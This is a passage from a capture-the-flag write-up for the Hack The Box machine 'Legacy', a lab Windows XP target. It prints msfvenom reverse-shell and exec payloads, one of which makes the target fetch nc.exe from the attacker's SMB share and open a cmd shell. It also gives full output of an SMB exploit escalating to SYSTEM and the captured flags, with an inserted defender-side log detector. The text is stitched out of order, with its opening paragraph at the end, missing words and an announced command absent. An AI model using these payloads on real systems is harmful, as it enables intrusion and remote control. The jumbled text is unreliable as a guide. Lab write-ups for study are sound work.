It seems the script requires an executable file containing the payload to be executed on the target. I can generate it using msfvenom:
msfvenom -p windows/shell/reverse_tcp LHOST=<my-ip> LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows > exploit.exe
I can now use the exploit script:
python zzz_exploit.py 10.10.10.4 exploit.exe
Upload and execute mode: ../exploit.exe
Target OS: Windows 5.1
No named pipe was specified explicitly via the NAMED_PIPE env variable, trying to auto-detect
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81fe1da8
SESSION: 0xe11808d8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe10e0378
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe10e0418
overwriting token UserAndGroups
Uploading payload
Executing payload as a service
Doing service exec
Got DCE RPC handle
DCE RPC connected
And bound
Opening SVCManager on 10.10.10.4.....
Creating service BBec.....
We got a service handle, starting BBec.....
Safe to ignore if you executed a non-service
The NETBIOS connection with the remote host timed out.
Removing service BBec.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
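As an added defender-side example (not part of the original writeup): the service-exec step above installs a service with a random four-character name (BBec), runs the uploaded payload through it and removes it seconds later. The Python below parses constructed Service Control Manager-style log lines (the line layout is an assumption; the event IDs are Windows' own) and flags services that match that short-lived, random-name, non-system-binary pattern.

```python
import re
from datetime import datetime

# Constructed sample log lines (not taken from the target above). The field
# layout is an assumption; the IDs are the Service Control Manager's:
# 7045 = a service was installed, 7036 = a service changed state.
SAMPLE_EVENTS = [
    "2017-03-16 09:20:01 EventID=7045 Service=Spooler Path=C:\\WINDOWS\\system32\\spoolsv.exe",
    "2017-03-16 09:20:01 EventID=7036 Service=Spooler State=running",
    "2017-03-16 09:20:05 EventID=7045 Service=BBec Path=C:\\WINDOWS\\exploit.exe",
    "2017-03-16 09:20:05 EventID=7036 Service=BBec State=running",
    "2017-03-16 09:20:09 EventID=7036 Service=BBec State=stopped",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) EventID=(?P<eid>\d+) Service=(?P<svc>\S+)"
    r"(?: Path=(?P<path>\S+))?(?: State=(?P<state>\S+))?$"
)
KNOWN_SERVICES = {"Spooler", "Browser", "lanmanserver"}  # baseline, hypothetical
SYSTEM_DIR = "c:\\windows\\system32"
MAX_LIFETIME_SECONDS = 60

def parse(lines):
    """Turn raw lines into dicts; skip anything that does not match the layout."""
    out = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
            out.append(d)
    return out

def find_short_lived_services(lines):
    """Flag services installed with a random-looking name and a binary outside
    system32 that stop again within a minute (the 'BBec' pattern above).
    Returns [(service_name, [reasons])]; a service needs two reasons to alert."""
    installed, stopped = {}, {}
    for e in parse(lines):
        if e["eid"] == "7045":
            installed[e["svc"]] = e
        elif e["eid"] == "7036" and e["state"] == "stopped":
            stopped[e["svc"]] = e["ts"]
    alerts = []
    for svc, e in installed.items():
        reasons = []
        if svc not in KNOWN_SERVICES and len(svc) <= 5:
            reasons.append("short unknown name")
        if e["path"] and not e["path"].lower().startswith(SYSTEM_DIR):
            reasons.append("binary outside system32")
        if svc in stopped and (stopped[svc] - e["ts"]).total_seconds() <= MAX_LIFETIME_SECONDS:
            reasons.append("stopped within %ds of install" % MAX_LIFETIME_SECONDS)
        if len(reasons) >= 2:
            alerts.append((svc, reasons))
    return alerts
```

Running it over SAMPLE_EVENTS flags only BBec; the legitimate Spooler entry has a known name, lives in system32 and never stops.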
On my listener, I get a connection but it instantly dies when I type anything:
sif0@kali:~/htb/retired/Legacy-10.10.10.4$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.4] 1039
whoami
sif0@kali:~/htb/retired/Legacy-10.10.10.4$
After trying numerous times, I got the same behavior. Knowing that I had code execution but that the process was maybe dying quickly, I opted for a different payload, one that does not require the process to stay alive. I used the payload windows/exec rather than windows/shell/reverse_tcp:
msfvenom -p windows/exec cmd='\\10.10.14.7\smb\nc.exe 10.10.14.7 9001 -e cmd.exe' EXITFUNC=thread -f exe -a x86 --platform windows > exec-exploit.exe
This command creates an executable whose payload opens an SMB connection to my machine and runs the binary nc.exe from that share with the parameters provided. Setting up my SMB share using impacket's smbserver.py:
sif0@kali:~/htb/retired/Legacy-10.10.10.4$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.4] 1045
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
For whatever reason, whoami doesn't work. It's because it is not pre-installed in Windows XP, I think, and requires installing a tool pack. I also tried a few other commands to determine the current user, but all of them failed:
C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
%USERNAME%
C:\WINDOWS\system32>echo %userdomain%
echo %userdomain%
%userdomain%
C:\WINDOWS\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.
I then just tried my luck to see whether I have access to the Administrator\Desktop directory, which I do:
C:\Documents and Settings\Administrator>dir Desktop
dir Desktop
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 <DIR> .
16/03/2017 09:18 <DIR> ..
16/03/2017 09:18 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.622.592 bytes free
I can also read root.txt:
C:\Documents and Settings\Administrator>type Desktop\root.txt
type Desktop\root.txt
993442d258b0e0ec917cae9e695d5713
Checking the users under the directory Documents and Settings, I found that the user john has user.txt in his Desktop folder:
C:\Documents and Settings>dir john\Desktop\
dir john\Desktop\
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 <DIR> .
16/03/2017 09:19 <DIR> ..
16/03/2017 09:19 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.618.496 bytes free
I can now read user.txt:
C:\Documents and Settings>type john\desktop\user.txt
type john\desktop\user.txt
e69af0e4f443d...
Takeaways
Legacy boxes like this are vulnerable to many exploits, but finding a working exploit that doesn't require a Metasploit module can take some time.
Since legacy versions have many exploits available, it can be cumbersome to find the exploit you really need or want.
If you get code execution but your process dies quickly, try a payload that executes a command which can get you a shell.
Based on the scan results, the Windows OS is XP (Windows 2000 LAN Manager), which is a very outdated version of Windows with lots of vulnerabilities. Thinking that this might be vulnerable to , I used searchsploit to find a PoC exploit:
It seems like any of these 3 exploits would work. I tried 2 of them and wasn't able to get them to work (maybe I was just stupid). Eventually, after Googling, I ended up with this , and got a working to work: